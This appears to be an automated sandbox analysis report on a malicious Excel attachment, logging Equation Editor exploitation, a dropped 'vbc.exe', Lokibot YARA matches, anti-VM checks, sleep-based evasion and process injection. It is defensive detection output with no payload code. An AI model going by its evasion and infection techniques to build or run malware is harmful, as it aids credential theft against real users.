              Source: C:\Users\Public\vbc.exeCode function: 4_2_00374008
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00375850
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00375458
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00375448
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00375268
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00375648
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00374ED0
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003782D8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0037A345
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00374BB1
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00374BC0
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006E3410
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006E7694
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006E4D3A
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006E0048
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006E0022
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006E3400
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006EBEDE
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006EDCA8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006E60A9
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006E60B8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006EDC98
              Source: C:\Users\Public\vbc.exeCode function: 4_2_045F22E9
              Source: C:\Users\Public\vbc.exeCode function: 4_2_045F230A
              Source: C:\Users\Public\vbc.exeCode function: 4_2_045F053C
              Source: C:\Users\Public\vbc.exeCode function: 4_2_045F09CE
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0040549C
              Source: C:\Users\Public\vbc.exeCode function: 5_2_004029D4
              Source: MV NAGOYA TRADER.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: C:\Users\Public\vbc.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\Public\vbc.exeCode function: String function: 00405B6F appears 42 times
              Source: C:\Users\Public\vbc.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
              Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: svchost[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/8@182/2
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$MV NAGOYA TRADER.xlsxJump to behavior
              Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR223F.tmpJump to behavior
              Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: MV NAGOYA TRADER.xlsxVirustotal: Detection: 31%
              Source: MV NAGOYA TRADER.xlsxReversingLabs: Detection: 25%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: unknownProcess created: C:\Users\Public\vbc.exe {path}
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: MV NAGOYA TRADER.xlsxStatic file information: File size 2653184 > 1048576
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: MV NAGOYA TRADER.xlsxInitial sample: OLE indicators vbamacros = False
              Source: MV NAGOYA TRADER.xlsxInitial sample: OLE indicators encrypted = True

              Data Obfuscation:

              barindex
              Detected unpacking (changes PE section rights)Show sources
              Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.e80000.2.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.e80000.2.unpack
              Binary contains a suspicious time stampShow sources
              Source: initial sampleStatic PE information: 0x8BB156F3 [Thu Apr 7 15:19:15 2044 UTC]
              Yara detected aPLib compressed binaryShow sources
              Source: Yara matchFile source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3040, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2952, type: MEMORY
              Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00378799 push ebx; retf
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006E93AA pushfd ; iretd
              Source: C:\Users\Public\vbc.exeCode function: 4_2_006EABA4 push ecx; retf
              Source: C:\Users\Public\vbc.exeCode function: 4_2_045F0EBF pushfd ; retf
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00402AC0 push eax; ret
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00402AC0 push eax; ret
              Source: initial sampleStatic PE information: section name: .text entropy: 7.32253552391
              Source: initial sampleStatic PE information: section name: .text entropy: 7.32253552391
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: MV NAGOYA TRADER.xlsxStream path 'EncryptedPackage' entropy: 7.99993139379 (max. 8.0)

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000004.00000002.2195981464.0000000002377000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2952, type: MEMORY
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME8
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL8
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1616Thread sleep time: -300000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2944Thread sleep time: -41500s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2916Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2496Thread sleep count: 35 > 30
              Source: C:\Users\Public\vbc.exe TID: 2496Thread sleep time: -2100000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2496Thread sleep time: -60000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2496Thread sleep time: -120000s >= -30000s
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: VMWARE8
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II8
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: QEMU8
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: VMwareHDNm
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: VMWARE
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: VMware HDNm
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: VMWAREHDNm
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: Mm%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: Mm"SOFTWARE\VMware, Inc.\VMware Tools8
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
              Source: vbc.exe, 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmpBinary or memory string: vmware8
              Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,
              Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
              Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
              Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
              Source: vbc.exe, 00000005.00000002.2391902240.0000000000F20000.00000002.00000001.sdmpBinary or memory string: Program Manager
